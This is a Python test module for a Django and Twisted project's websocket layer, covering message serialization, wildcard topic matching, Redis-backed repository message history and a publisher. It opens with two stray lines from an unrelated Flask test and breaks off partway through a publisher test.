response = app.test_client().get('/')
assert b'Myk' in response.data
|
# Run these tests with `DJANGO_SETTINGS_MODULE=gim.settings.tests trial gim.test_ws`
import json
import logging
import unittest
import txredisapi as txredis
from django.conf import settings
from limpyd.exceptions import DoesNotExist
from mock import call, patch
from redis.lock import Lock
from twisted.internet.defer import inlineCallbacks
from twisted.trial import unittest as txunittest
from gim import ws
patch.object = patch.object
logging.disable(logging.CRITICAL)
if not getattr(settings, 'TEST_SETTINGS', False):
raise RuntimeError('Tests must be run with DJANGO_SETTINGS_MODULE=gim.settings.tests')
class UtilsTestCase(unittest.TestCase):
def test_serialize(self):
result = ws.serialize(123, 'foo', 1, b=2)
self.assertEqual(
json.loads(result),
{
'msg_id': 123,
'topic': 'foo',
'args': [1],
'kwargs': {'b': 2}
}
)
def test_normalize_topic(self):
result = ws.normalize_topic('gim.foo')
self.assertEqual(result, 'gim.foo')
result = ws.normalize_topic('foo')
self.assertEqual(result, 'gim.foo')
def test_add_ws_extra_details(self):
d = {'x': 'y'}
result = ws.add_ws_extra_details(d, 'foo', 1)
self.assertIsNone(result)
self.assertEqual(d, {'x': 'y', 'ws_extra': {'topic': 'foo', 'msg_id': 1}})
def test_prepare_rules(self):
result = ws.prepare_rules(None)
self.assertIsNone(result)
result = ws.prepare_rules([])
self.assertEqual(result, [])
result = ws.prepare_rules([
('foo', ws.TOPIC_TYPE_EXACT),
('foo.bar', ws.TOPIC_TYPE_EXACT),
('bar', ws.TOPIC_TYPE_PREFIX),
('bar.baz.', ws.TOPIC_TYPE_PREFIX),
('foo..baz', ws.TOPIC_TYPE_WILDCARD),
('..baz', ws.TOPIC_TYPE_WILDCARD),
('foo..', ws.TOPIC_TYPE_WILDCARD),
('.bar.', ws.TOPIC_TYPE_WILDCARD),
('..', ws.TOPIC_TYPE_WILDCARD),
])
self.assertEqual(len(result), 3)
self.assertEqual(result[ws.TOPIC_TYPE_EXACT], [
('foo', 'foo'),
('foo.bar', 'foo.bar'),
])
self.assertEqual(result[ws.TOPIC_TYPE_PREFIX], [
('bar', 'bar'),
('bar.baz.', 'bar.baz.'),
])
self.assertEqual([(o, r.pattern) for o, r in result[ws.TOPIC_TYPE_WILDCARD]], [
('foo..baz', r'^foo\.[^\.]+\.baz$'),
('..baz', r'^[^\.]+\.[^\.]+\.baz$'),
('foo..', r'^foo\.[^\.]+\.[^\.]+$'),
('.bar.', r'^[^\.]+\.bar\.[^\.]+$'),
('..', r'^[^\.]+\.[^\.]+\.[^\.]+$'),
])
def test_restrict_topics(self):
result = ws.restrict_topics(['foo', 'bar'], None)
self.assertEqual(result, {
'foo': [],
'bar': [],
})
result = ws.restrict_topics(['foo', 'bar'], [])
self.assertEqual(result, {})
result = ws.restrict_topics([
'foo',
'bar',
'bar2',
'baz',
'foo.bar.baz',
'foo.bar2.baz',
'foo.bar2.baz2',
'foo.bar.qux.baz',
'foo.bar.qux.quz.baz',
], [
('foo', ws.TOPIC_TYPE_EXACT),
('bar', ws.TOPIC_TYPE_PREFIX),
('bar2', ws.TOPIC_TYPE_EXACT),
('foo..baz', ws.TOPIC_TYPE_WILDCARD),
])
self.assertEqual(result, {
'foo': [('foo', ws.TOPIC_TYPE_EXACT), ],
'bar': [('bar', ws.TOPIC_TYPE_PREFIX), ],
'bar2': [('bar2', ws.TOPIC_TYPE_EXACT), ('bar', ws.TOPIC_TYPE_PREFIX), ],
'foo.bar.baz': [('foo..baz', ws.TOPIC_TYPE_WILDCARD), ],
'foo.bar2.baz': [('foo..baz', ws.TOPIC_TYPE_WILDCARD), ],
})
# test values from
# https://github.com/crossbario/crossbar/blob/master/crossbar/router/test/test_wildcard.py
WILDCARDS = ['.', 'a..c', 'a.b.', 'a..', '.b.', '..', 'x..', '.x.', '..x', 'x..x', 'x.x.',
'.x.x', 'x.x.x']
MATCHES = {
'abc': [],
'a.b': ['.'],
'a.b.c': ['a..c', 'a.b.', 'a..', '.b.', '..'],
'a.x.c': ['a..c', 'a..', '..', '.x.'],
'a.b.x': ['a.b.', 'a..', '.b.', '..', '..x'],
'a.x.x': ['a..', '..', '.x.', '..x', '.x.x'],
'x.y.z': ['..', 'x..'],
'a.b.c.d': []
}
for topic in MATCHES:
for pattern in WILDCARDS:
result = ws.restrict_topics([topic], [(pattern, ws.TOPIC_TYPE_WILDCARD)])
if pattern in MATCHES[topic]:
self.assertEqual(result, {topic: [(pattern, ws.TOPIC_TYPE_WILDCARD)]},
'Pattern `%s` should match topic `%s`, but it doesn\'t match' % (
pattern, topic))
else:
self.assertEqual(result, {},
'Pattern `%s` should not match topic `%s`, but it matches' % (
pattern, topic))
class UsingSyncRedis(unittest.TestCase):
@classmethod
def flushdb(cls):
database = ws.get_ws_limpyd_database()
database.connection.flushdb()
def setUp(self):
super(UsingSyncRedis, self).setUp()
self.flushdb()
def tearDown(self):
self.flushdb()
super(UsingSyncRedis, self).tearDown()
class UsingAsyncRedis(txunittest.TestCase):
@inlineCallbacks
def flushdb(self):
yield self.db.flushdb()
@inlineCallbacks
def setUp(self):
super(UsingAsyncRedis, self).setUp()
self.db = yield txredis.Connection(
host=settings.LIMPYD_DB_WS_CONFIG['host'],
port=settings.LIMPYD_DB_WS_CONFIG['port'],
dbid=settings.LIMPYD_DB_WS_CONFIG['db'],
reconnect=False
)
ws.AsyncHistoryMixin.redis_connection = self.db
yield self.flushdb()
@inlineCallbacks
def tearDown(self):
yield self.flushdb()
yield self.db.disconnect()
super(UsingAsyncRedis, self).tearDown()
class RepositoryHistoryTestCase(UsingSyncRedis):
def test_get_for(self):
# Existing entry
ws.RepositoryHistory(pk=666)
result = ws.RepositoryHistory.get_for(666, async=False)
self.assertEqual(result._pk, '666')
self.assertTrue(result.connected)
result = ws.RepositoryHistory.get_for(666, async=True)
self.assertEqual(result._pk, '666')
self.assertFalse(result.connected)
# New entry
result = ws.RepositoryHistory.get_for(667, async=False)
self.assertEqual(result._pk, '667')
self.assertTrue(result.connected)
result = ws.RepositoryHistory.get_for(668, async=True)
self.assertEqual(result._pk, '668')
self.assertFalse(result.connected)
def test_all_topics(self):
obj = ws.RepositoryHistory.get_for(1)
# Add two members
obj.messages.get_for('foo').zadd(123, 'do-not-care')
obj.messages.get_for('bar').zadd(456, 'still-do-not-care')
topics = obj.all_topics()
self.assertEqual(topics, {'foo', 'bar'})
def test_save_message_without_pipeline(self):
# Save a first message
obj = ws.RepositoryHistory.get_for(1)
obj.save_message(123, 'foo', 1, b=2)
topics = obj.all_topics()
self.assertEqual(topics, {'foo'})
messages_foo = obj.messages.get_for('foo').zrange(0, -1, withscores=True)
self.assertEqual(messages_foo, [
(ws.serialize(123, 'foo', 1, b=2), 123),
])
messages_bar = obj.messages.get_for('bar').zrange(0, -1, withscores=True)
self.assertEqual(messages_bar, [])
last_msg_id = obj.get_last_msg_id()
self.assertEqual(last_msg_id, 123)
# Save another message for the same repository, same topic
obj = ws.RepositoryHistory.get_for(1)
obj.save_message(124, 'foo', 11, b=22)
topics = obj.all_topics()
self.assertEqual(topics, {'foo'})
messages_foo = obj.messages.get_for('foo').zrange(0, -1, withscores=True)
self.assertEqual(messages_foo, [
(ws.serialize(123, 'foo', 1, b=2), 123),
(ws.serialize(124, 'foo', 11, b=22), 124),
])
messages_bar = obj.messages.get_for('bar').zrange(0, -1, withscores=True)
self.assertEqual(messages_bar, [])
last_msg_id = obj.get_last_msg_id()
self.assertEqual(last_msg_id, 124)
# Save another message for the same repository, other topic
obj = ws.RepositoryHistory.get_for(1)
obj.save_message(125, 'bar', 111, b=222)
topics = obj.all_topics()
self.assertEqual(topics, {'foo', 'bar'})
messages_foo = obj.messages.get_for('foo').zrange(0, -1, withscores=True)
self.assertEqual(messages_foo, [
(ws.serialize(123, 'foo', 1, b=2), 123),
(ws.serialize(124, 'foo', 11, b=22), 124),
])
messages_bar = obj.messages.get_for('bar').zrange(0, -1, withscores=True)
self.assertEqual(messages_bar, [
(ws.serialize(125, 'bar', 111, b=222), 125),
])
last_msg_id = obj.get_last_msg_id()
self.assertEqual(last_msg_id, 125)
# Save another message for another repository, other topic
obj = ws.RepositoryHistory.get_for(2)
obj.save_message(126, 'bar', 1111, b=2222)
topics = obj.all_topics()
self.assertEqual(topics, {'bar'})
messages_foo = obj.messages.get_for('foo').zrange(0, -1, withscores=True)
self.assertEqual(messages_foo, [])
messages_bar = obj.messages.get_for('bar').zrange(0, -1, withscores=True)
self.assertEqual(messages_bar, [
(ws.serialize(126, 'bar', 1111, b=2222), 126),
])
last_msg_id = obj.get_last_msg_id()
self.assertEqual(last_msg_id, 126)
def test_save_message_with_pipeline(self):
obj = ws.RepositoryHistory.get_for(1)
with ws.RepositoryHistory.database.pipeline() as pipeline:
obj.save_message(123, 'foo', 1, b=2)
pipeline.execute()
topics = obj.all_topics()
self.assertEqual(topics, {'foo'})
messages_foo = obj.messages.get_for('foo').zrange(0, -1, withscores=True)
self.assertEqual(messages_foo, [
(ws.serialize(123, 'foo', 1, b=2), 123),
])
messages_bar = obj.messages.get_for('bar').zrange(0, -1, withscores=True)
self.assertEqual(messages_bar, [])
last_msg_id = obj.get_last_msg_id()
self.assertEqual(last_msg_id, 123)
def test_get_last_msg_id(self):
entry = ws.RepositoryHistory(pk=666)
result = entry.get_last_msg_id()
self.assertEqual(result, 0)
entry = ws.RepositoryHistory(pk=667, last_msg_id=123)
result = entry.get_last_msg_id()
self.assertEqual(result, 123)
def test_get_new_msg_id(self):
entry = ws.RepositoryHistory(pk=666)
result = entry.get_new_msg_id()
self.assertEqual(result, 1)
result = entry.get_last_msg_id()
self.assertEqual(result, 1)
result = entry.get_new_msg_id()
self.assertEqual(result, 2)
result = entry.get_last_msg_id()
self.assertEqual(result, 2)
def test_get_last_msg_id_sent(self):
entry = ws.RepositoryHistory(pk=666)
result = entry.get_last_msg_id_sent()
self.assertEqual(result, 0)
entry = ws.RepositoryHistory(pk=667, last_msg_id_sent=123)
result = entry.get_last_msg_id_sent()
self.assertEqual(result, 123)
def test_save_last_sent_message_without_pipeline(self):
entry = ws.RepositoryHistory(pk=666)
result = entry.get_last_msg_id_sent()
self.assertEqual(result, 0)
entry.save_last_sent_message(123)
result = entry.get_last_msg_id_sent()
self.assertEqual(result, 123)
def test_save_last_sent_message_with_pipeline(self):
entry = ws.RepositoryHistory(pk=666)
result = entry.get_last_msg_id_sent()
self.assertEqual(result, 0)
with entry.database.pipeline() as pipeline:
entry.save_last_sent_message(123)
pipeline.execute()
result = entry.get_last_msg_id_sent()
self.assertEqual(result, 123)
def test_get_messages(self):
entry = ws.RepositoryHistory(pk=666)
messages_foo = entry.messages.get_for('foo')
messages_bar = entry.messages.get_for('bar.xxx')
messages_baz = entry.messages.get_for('baz.yyy.baz')
messages_foo.zadd(2, json.dumps({'foo': 'msg-2'}))
messages_bar.zadd(3, json.dumps({'bar': 'msg-3'}))
messages_foo.zadd(4, json.dumps({'foo': 'msg-4'}))
messages_foo.zadd(5, json.dumps({'foo': 'msg-5'}))
messages_baz.zadd(6, json.dumps({'baz': 'msg-6'}))
result = entry.get_messages()
self.assertEqual(result, [
(2, {'foo': 'msg-2'}, 'foo', []),
(3, {'bar': 'msg-3'}, 'bar.xxx', []),
(4, {'foo': 'msg-4'}, 'foo', []),
(5, {'foo': 'msg-5'}, 'foo', []),
(6, {'baz': 'msg-6'}, 'baz.yyy.baz', []),
])
result = entry.get_messages(topics_rules=[])
self.assertEqual(result, [])
result = entry.get_messages(topics_rules=[
('foo', ws.TOPIC_TYPE_EXACT),
('baz', ws.TOPIC_TYPE_PREFIX),
])
self.assertEqual(result, [
(2, {'foo': 'msg-2'}, 'foo', [('foo', ws.TOPIC_TYPE_EXACT), ]),
(4, {'foo': 'msg-4'}, 'foo', [('foo', ws.TOPIC_TYPE_EXACT), ]),
(5, {'foo': 'msg-5'}, 'foo', [('foo', ws.TOPIC_TYPE_EXACT), ]),
(6, {'baz': 'msg-6'}, 'baz.yyy.baz', [('baz', ws.TOPIC_TYPE_PREFIX), ]),
])
result = entry.get_messages(topics_rules=[
('qux', ws.TOPIC_TYPE_EXACT),
('bar.', ws.TOPIC_TYPE_PREFIX),
('baz..baz', ws.TOPIC_TYPE_WILDCARD),
])
self.assertEqual(result, [
(3, {'bar': 'msg-3'}, 'bar.xxx', [('bar.', ws.TOPIC_TYPE_PREFIX), ]),
(6, {'baz': 'msg-6'}, 'baz.yyy.baz', [('baz..baz', ws.TOPIC_TYPE_WILDCARD), ]),
])
result = entry.get_messages(3)
self.assertEqual(result, [
(3, {'bar': 'msg-3'}, 'bar.xxx', []),
(4, {'foo': 'msg-4'}, 'foo', []),
(5, {'foo': 'msg-5'}, 'foo', []),
(6, {'baz': 'msg-6'}, 'baz.yyy.baz', []),
])
result = entry.get_messages(last_msg_id=4)
self.assertEqual(result, [
(2, {'foo': 'msg-2'}, 'foo', []),
(3, {'bar': 'msg-3'}, 'bar.xxx', []),
(4, {'foo': 'msg-4'}, 'foo', []),
])
result = entry.get_messages(3, 4)
self.assertEqual(result, [
(3, {'bar': 'msg-3'}, 'bar.xxx', []),
(4, {'foo': 'msg-4'}, 'foo', []),
])
result = entry.get_messages(3, 3)
self.assertEqual(result, [
(3, {'bar': 'msg-3'}, 'bar.xxx', []),
])
result = entry.get_messages(4, 3)
self.assertEqual(result, [])
result = entry.get_messages(7, 9)
self.assertEqual(result, [])
result = entry.get_messages(7)
self.assertEqual(result, [])
result = entry.get_messages(last_msg_id=1)
self.assertEqual(result, [])
result = entry.get_messages(0.5, 1)
self.assertEqual(result, [])
def test_get_all_message_ids(self):
entry = ws.RepositoryHistory(pk=666)
result = entry.get_all_message_ids()
self.assertEqual(result, [])
messages_foo = entry.messages.get_for('foo')
messages_bar = entry.messages.get_for('bar.xxx')
messages_baz = entry.messages.get_for('baz.yyy.baz')
messages_foo.zadd(2, json.dumps({'foo': 'msg-2'}))
messages_bar.zadd(3, json.dumps({'bar': 'msg-3'}))
messages_foo.zadd(4, json.dumps({'foo': 'msg-4'}))
messages_foo.zadd(5, json.dumps({'foo': 'msg-5'}))
messages_baz.zadd(6, json.dumps({'baz': 'msg-6'}))
result = entry.get_all_message_ids()
self.assertEqual(set(result), {2, 3, 4, 5, 6})
def test_clean(self):
entry = ws.RepositoryHistory(pk=666)
# Prepare some topics
messages_foo = entry.messages.get_for('foo')
messages_bar = entry.messages.get_for('bar.xxx')
# And save messages
messages_foo.zadd(2, json.dumps({'foo': 'msg-2'}))
messages_bar.zadd(3, json.dumps({'bar': 'msg-3'}))
messages_foo.zadd(4, json.dumps({'foo': 'msg-4'}))
messages_foo.zadd(5, json.dumps({'foo': 'msg-5'}))
# Clean
deleted = entry.clean(4)
self.assertEqual(deleted, 2)
# No trace of the deleted messages anymore
result = entry.get_all_message_ids()
self.assertEqual(set(result), {4, 5})
# Do it for empty repository
entry = ws.RepositoryHistory(pk=667)
deleted = entry.clean(4)
self.assertEqual(deleted, 0)
class AsyncRepositoryHistoryTestCase(UsingAsyncRedis):
@inlineCallbacks
def test_get_for_without_pipeline(self):
result = yield ws.AsyncRepositoryHistory.get_for(666)
self.assertIsInstance(result.source_object, ws.RepositoryHistory)
self.assertEqual(result.source_object._pk, '666')
@inlineCallbacks
def test_get_for_with_pipeline(self):
pipeline = yield self.db.multi()
result = yield ws.AsyncRepositoryHistory.get_for(666, pipeline=pipeline)
yield pipeline.commit()
self.assertIsInstance(result.source_object, ws.RepositoryHistory)
self.assertEqual(result.source_object._pk, '666')
@inlineCallbacks
def test_all_topics(self):
obj = yield ws.AsyncRepositoryHistory.get_for(1)
# Add two members
yield self.db.sadd(obj.source_object.messages._inventory.key, ['foo'])
yield self.db.sadd(obj.source_object.messages._inventory.key, ['bar'])
topics = yield obj.all_topics()
self.assertEqual(topics, {'foo', 'bar'})
@inlineCallbacks
def test_save_message_without_pipeline(self):
# Save a first message
obj = yield ws.AsyncRepositoryHistory.get_for(1)
yield obj.save_message(123, 'foo', 1, b=2)
topics = yield obj.all_topics()
self.assertEqual(topics, {'foo'})
messages_foo = yield self.db.zrange(obj.source_object.messages.get_for('foo').key, 0, -1,
withscores=True)
self.assertEqual(messages_foo, [
(ws.serialize(123, 'foo', 1, b=2), 123),
])
messages_bar = yield self.db.zrange(obj.source_object.messages.get_for('bar').key, 0, -1,
withscores=True)
self.assertEqual(messages_bar, [])
last_msg_id = yield obj.get_last_msg_id()
self.assertEqual(last_msg_id, 123)
# Save another message for the same repository, same topic
obj = yield ws.AsyncRepositoryHistory.get_for(1)
yield obj.save_message(124, 'foo', 11, b=22)
topics = yield obj.all_topics()
self.assertEqual(topics, {'foo'})
messages_foo = yield self.db.zrange(obj.source_object.messages.get_for('foo').key, 0, -1,
withscores=True)
self.assertEqual(messages_foo, [
(ws.serialize(123, 'foo', 1, b=2), 123),
(ws.serialize(124, 'foo', 11, b=22), 124),
])
messages_bar = yield self.db.zrange(obj.source_object.messages.get_for('bar').key, 0, -1,
withscores=True)
self.assertEqual(messages_bar, [])
last_msg_id = yield obj.get_last_msg_id()
self.assertEqual(last_msg_id, 124)
# Save another message for the same repository, other topic
obj = yield ws.AsyncRepositoryHistory.get_for(1)
yield obj.save_message(125, 'bar', 111, b=222)
topics = yield obj.all_topics()
self.assertEqual(topics, {'foo', 'bar'})
messages_foo = yield self.db.zrange(obj.source_object.messages.get_for('foo').key, 0, -1,
withscores=True)
self.assertEqual(messages_foo, [
(ws.serialize(123, 'foo', 1, b=2), 123),
(ws.serialize(124, 'foo', 11, b=22), 124),
])
messages_bar = yield self.db.zrange(obj.source_object.messages.get_for('bar').key, 0, -1,
withscores=True)
self.assertEqual(messages_bar, [
(ws.serialize(125, 'bar', 111, b=222), 125),
])
last_msg_id = yield obj.get_last_msg_id()
self.assertEqual(last_msg_id, 125)
# Save another message for another repository, other topic
obj = yield ws.AsyncRepositoryHistory.get_for(2)
yield obj.save_message(126, 'bar', 1111, b=2222)
topics = yield obj.all_topics()
self.assertEqual(topics, {'bar'})
messages_foo = yield self.db.zrange(obj.source_object.messages.get_for('foo').key, 0, -1,
withscores=True)
self.assertEqual(messages_foo, [])
messages_bar = yield self.db.zrange(obj.source_object.messages.get_for('bar').key, 0, -1,
withscores=True)
self.assertEqual(messages_bar, [
(ws.serialize(126, 'bar', 1111, b=2222), 126),
])
last_msg_id = yield obj.get_last_msg_id()
self.assertEqual(last_msg_id, 126)
@inlineCallbacks
def test_save_message_with_pipeline(self):
obj = yield ws.AsyncRepositoryHistory.get_for(1)
pipeline = yield self.db.multi()
obj.save_message(123, 'foo', 1, b=2, pipeline=pipeline)
yield pipeline.commit()
topics = yield obj.all_topics()
self.assertEqual(topics, {'foo'})
messages_foo = yield self.db.zrange(obj.source_object.messages.get_for('foo').key, 0, -1,
withscores=True)
self.assertEqual(messages_foo, [
(ws.serialize(123, 'foo', 1, b=2), 123),
])
messages_bar = yield self.db.zrange(obj.source_object.messages.get_for('bar').key, 0, -1,
withscores=True)
self.assertEqual(messages_bar, [])
last_msg_id = yield obj.get_last_msg_id()
self.assertEqual(last_msg_id, 123)
@inlineCallbacks
def test_get_last_msg_id(self):
entry = yield ws.AsyncRepositoryHistory.get_for(666)
result = yield entry.get_last_msg_id()
self.assertEqual(result, 0)
entry = yield ws.AsyncRepositoryHistory.get_for(667)
yield self.db.set(entry.source_object.last_msg_id.key, 123)
result = yield entry.get_last_msg_id()
self.assertEqual(result, 123)
@inlineCallbacks
def test_get_new_msg_id(self):
entry = yield ws.AsyncRepositoryHistory.get_for(666)
result = yield entry.get_new_msg_id()
self.assertEqual(result, 1)
result = yield entry.get_last_msg_id()
self.assertEqual(result, 1)
result = yield entry.get_new_msg_id()
self.assertEqual(result, 2)
result = yield entry.get_last_msg_id()
self.assertEqual(result, 2)
@inlineCallbacks
def test_get_last_msg_id_sent(self):
entry = yield ws.AsyncRepositoryHistory.get_for(666)
result = yield entry.get_last_msg_id_sent()
self.assertEqual(result, 0)
entry = yield ws.AsyncRepositoryHistory.get_for(667)
yield self.db.set(entry.source_object.last_msg_id_sent.key, 123)
result = yield entry.get_last_msg_id_sent()
self.assertEqual(result, 123)
@inlineCallbacks
def test_save_last_sent_message_without_pipeline(self):
entry = yield ws.AsyncRepositoryHistory.get_for(666)
result = yield entry.get_last_msg_id_sent()
self.assertEqual(result, 0)
yield entry.save_last_sent_message(123)
result = yield entry.get_last_msg_id_sent()
self.assertEqual(result, 123)
@inlineCallbacks
def test_save_last_sent_message_with_pipeline(self):
entry = yield ws.AsyncRepositoryHistory.get_for(666)
result = yield entry.get_last_msg_id_sent()
self.assertEqual(result, 0)
pipeline = yield self.db.multi()
yield entry.save_last_sent_message(123, pipeline=pipeline)
yield pipeline.commit()
result = yield entry.get_last_msg_id_sent()
self.assertEqual(result, 123)
@inlineCallbacks
def test_get_messages(self):
entry = yield ws.AsyncRepositoryHistory.get_for(666)
messages_foo = entry.source_object.messages.get_for('foo')
messages_bar = entry.source_object.messages.get_for('bar.xxx')
messages_baz = entry.source_object.messages.get_for('baz.yyy.baz')
yield self.db.zadd(messages_foo.key, 2, json.dumps({'foo': 'msg-2'}))
yield self.db.zadd(messages_bar.key, 3, json.dumps({'bar': 'msg-3'}))
yield self.db.zadd(messages_foo.key, 4, json.dumps({'foo': 'msg-4'}))
yield self.db.zadd(messages_foo.key, 5, json.dumps({'foo': 'msg-5'}))
yield self.db.zadd(messages_baz.key, 6, json.dumps({'baz': 'msg-6'}))
yield self.db.sadd(entry.source_object.messages._inventory.key,
['foo', 'bar.xxx', 'baz.yyy.baz'])
result = yield entry.get_messages()
self.assertEqual(result, [
(2, {'foo': 'msg-2'}, 'foo', []),
(3, {'bar': 'msg-3'}, 'bar.xxx', []),
(4, {'foo': 'msg-4'}, 'foo', []),
(5, {'foo': 'msg-5'}, 'foo', []),
(6, {'baz': 'msg-6'}, 'baz.yyy.baz', []),
])
result = yield entry.get_messages(topics_rules=[])
self.assertEqual(result, [])
result = yield entry.get_messages(topics_rules=[
('foo', ws.TOPIC_TYPE_EXACT),
('baz', ws.TOPIC_TYPE_PREFIX),
])
self.assertEqual(result, [
(2, {'foo': 'msg-2'}, 'foo', [('foo', ws.TOPIC_TYPE_EXACT), ]),
(4, {'foo': 'msg-4'}, 'foo', [('foo', ws.TOPIC_TYPE_EXACT), ]),
(5, {'foo': 'msg-5'}, 'foo', [('foo', ws.TOPIC_TYPE_EXACT), ]),
(6, {'baz': 'msg-6'}, 'baz.yyy.baz', [('baz', ws.TOPIC_TYPE_PREFIX), ]),
])
result = yield entry.get_messages(topics_rules=[
('qux', ws.TOPIC_TYPE_EXACT),
('bar.', ws.TOPIC_TYPE_PREFIX),
('baz..baz', ws.TOPIC_TYPE_WILDCARD),
])
self.assertEqual(result, [
(3, {'bar': 'msg-3'}, 'bar.xxx', [('bar.', ws.TOPIC_TYPE_PREFIX), ]),
(6, {'baz': 'msg-6'}, 'baz.yyy.baz', [('baz..baz', ws.TOPIC_TYPE_WILDCARD), ]),
])
result = yield entry.get_messages(3)
self.assertEqual(result, [
(3, {'bar': 'msg-3'}, 'bar.xxx', []),
(4, {'foo': 'msg-4'}, 'foo', []),
(5, {'foo': 'msg-5'}, 'foo', []),
(6, {'baz': 'msg-6'}, 'baz.yyy.baz', []),
])
result = yield entry.get_messages(last_msg_id=4)
self.assertEqual(result, [
(2, {'foo': 'msg-2'}, 'foo', []),
(3, {'bar': 'msg-3'}, 'bar.xxx', []),
(4, {'foo': 'msg-4'}, 'foo', []),
])
result = yield entry.get_messages(3, 4)
self.assertEqual(result, [
(3, {'bar': 'msg-3'}, 'bar.xxx', []),
(4, {'foo': 'msg-4'}, 'foo', []),
])
result = yield entry.get_messages(3, 3)
self.assertEqual(result, [
(3, {'bar': 'msg-3'}, 'bar.xxx', []),
])
result = yield entry.get_messages(4, 3)
self.assertEqual(result, [])
result = yield entry.get_messages(7, 9)
self.assertEqual(result, [])
result = yield entry.get_messages(7)
self.assertEqual(result, [])
result = yield entry.get_messages(last_msg_id=1)
self.assertEqual(result, [])
result = yield entry.get_messages(0.5, 1)
self.assertEqual(result, [])
@inlineCallbacks
def test_get_all_message_ids(self):
entry = yield ws.AsyncRepositoryHistory.get_for(666)
result = yield entry.get_all_message_ids()
self.assertEqual(result, [])
messages_foo = entry.source_object.messages.get_for('foo')
messages_bar = entry.source_object.messages.get_for('bar.xxx')
messages_baz = entry.source_object.messages.get_for('baz.yyy.baz')
yield self.db.zadd(messages_foo.key, 2, json.dumps({'foo': 'msg-2'}))
yield self.db.zadd(messages_bar.key, 3, json.dumps({'bar': 'msg-3'}))
yield self.db.zadd(messages_foo.key, 4, json.dumps({'foo': 'msg-4'}))
yield self.db.zadd(messages_foo.key, 5, json.dumps({'foo': 'msg-5'}))
yield self.db.zadd(messages_baz.key, 6, json.dumps({'baz': 'msg-6'}))
yield self.db.sadd(entry.source_object.messages._inventory.key,
['foo', 'bar.xxx', 'baz.yyy.baz'])
result = yield entry.get_all_message_ids()
self.assertEqual(set(result), {2, 3, 4, 5, 6, 6})
@inlineCallbacks
def test_delete(self):
repo1 = yield ws.AsyncRepositoryHistory.get_for(666)
repo2 = yield ws.AsyncRepositoryHistory.get_for(667)
messages_1 = repo1.source_object.messages.get_for('foo')
messages_2 = repo2.source_object.messages.get_for('bar.xxx')
yield self.db.zadd(messages_1.key, 1, json.dumps({'foo': 'msg-1'}))
yield repo1.save_last_sent_message(1)
yield self.db.set(repo1.source_object.last_msg_id.key, 1)
yield self.db.sadd(repo1.source_object.messages._inventory.key, ['foo'])
yield self.db.zadd(messages_2.key, 2, json.dumps({'bar': 'msg-2'}))
yield repo2.save_last_sent_message(1)
yield self.db.set(repo2.source_object.last_msg_id.key, 1)
yield self.db.sadd(repo2.source_object.messages._inventory.key, ['bar.xxx'])
# Delete repo2
yield repo2.delete()
# No keys in redis for this repository anymore
keys = yield self.db.keys(repo2.source_object.make_key(
repo2.source_object._name,
repo2.source_object._pk,
'*'
))
self.assertEqual(keys, [])
# And check it is removed from the repositories collection
collection = yield self.db.smembers(repo2.source_object.pk.collection_key)
self.assertEqual(collection, {666})
class PublisherTestCase(UsingSyncRedis):
PK = ws.Publisher.PK
sPK = str(PK)
def setUp(self):
super(PublisherTestCase, self).setUp()
self.publisher = ws.Publisher.get_for(self.PK)
def test_get_for(self):
# Existing entry
result = ws.Publisher.get_for(666, async=False)
self.assertEqual(result._pk, self.sPK)
self.assertTrue(result.connected)
result = ws.Publisher.get_for(666, async=True)
self.assertEqual(result._pk, self.sPK)
self.assertFalse(result.connected)
# Without pk
result = ws.Publisher.get_for()
self.assertEqual(result._pk, self.sPK)
self.assertTrue(result.connected)
# Non existing entry
self.flushdb()
result = ws.Publisher.get_for(667, async=False)
self.assertEqual(result._pk, self.sPK)
self.assertTrue(result.connected)
self.flushdb()
result = ws.Publisher.get_for(668, async=True)
self.assertEqual(result._pk, self.sPK)
self.assertFalse(result.connected)
def test_singleton(self):
result1 = ws.Publisher.singleton()
self.assertIsInstance(result1, ws.Publisher)
self.assertEqual(result1._pk, self.sPK)
self.assertTrue(result1.connected)
result2 = ws.Publisher.singleton()
self.assertIs(result2, result1)
def test_lock_key(self):
self.assertEqual(self.publisher.lock_key, 'ws4:publisher:%s:lock' % self.sPK)
def test_lock_publishing(self):
lock = self.publisher.lock_publishing()
self.assertIsInstance(lock, Lock)
self.assertEqual(lock.name, self.publisher.lock_key)
def test_save_message_for_repository(self):
with patch.object(ws.RepositoryHistory, 'save_message') as repository_save_message:
msg_id = self.publisher.save_message('foo', 666, 11, b=22)
self.assertEqual(msg_id, 1)
result = self.publisher.get_last_msg_id()
self.assertEqual(result, 1)
# Check the message id is tied to the repository
repositories = self.publisher.repositories.zrange(0, -1, withscores=True)
self.assertEqual(repositories, [
('1:666', 1)
])
# We should have called `save_message` for the repository
repository_save_message.assert_called_once_with(1, 'foo', 11, b=22)
# And the message should not be stored in the global store
messages = self.publisher.messages.get_for('foo').zrange(0, -1, withscores=True)
self.assertEqual(messages, [])
def test_save_message_not_for_repository(self):
with patch.object(ws.RepositoryHistory, 'save_message') as repository_save_message:
msg_id = self.publisher.save_message('foo', None, 11, b=22)
self.assertEqual(msg_id, 1)
result = self.publisher.get_last_msg_id()
self.assertEqual(result, 1)
# Check the message id is NOT tied to the repository
repositories = self.publisher.repositories.zrange(0, -1, withscores=True)
self.assertEqual(repositories, [
('1:', 1)
])
# We should have NOT called `save_message` for the repository
self.assertEqual(repository_save_message.call_count, 0)
# But the message should be stored in the global store
messages = self.publisher.messages.get_for('foo').zrange(0, -1, withscores=True)
self.assertEqual(messages, [
(ws.serialize(1, 'foo', 11, b=22), 1),
])
def test_send_message_for_repository(self):
with patch.object(self.publisher.http_client, 'publish') as publish:
self.publisher.send_message(123, 'foo', 666, 11, b=22)
# We published to crossbar
publish.assert_called_once_with('foo', 11, b=22)
# We saved the last message for the repository
obj = ws.RepositoryHistory.get_for(666)
last_msg_id_sent = obj.get_last_msg_id_sent()
self.assertEqual(last_msg_id_sent, 123)
# And globally
last_msg_id_sent = self.publisher.get_last_msg_id_sent()
self.assertEqual(last_msg_id_sent, 123)
def test_send_message_not_for_repository(self):
with patch.object(self.publisher.http_client, 'publish') as publish:
with patch.object(ws.RepositoryHistory, 'save_last_sent_message') as \
repository_save_last_sent_message:
self.publisher.send_message(123, 'foo', None, 11, b=22)
# We published to crossbar
publish.assert_called_once_with('foo', 11, b=22)
# We DIDN'T save the last message for any repository
self.assertEqual(repository_save_last_sent_message.call_count, 0)
# But globally
last_msg_id_sent = self.publisher.get_last_msg_id_sent()
self.assertEqual(last_msg_id_sent, 123)
def test_send_messages(self):
messages = [
(5, 'gim.bar', '667', [1], {'b': 2}),
(6, 'gim.foo', '666', [11], {'b': 22}),
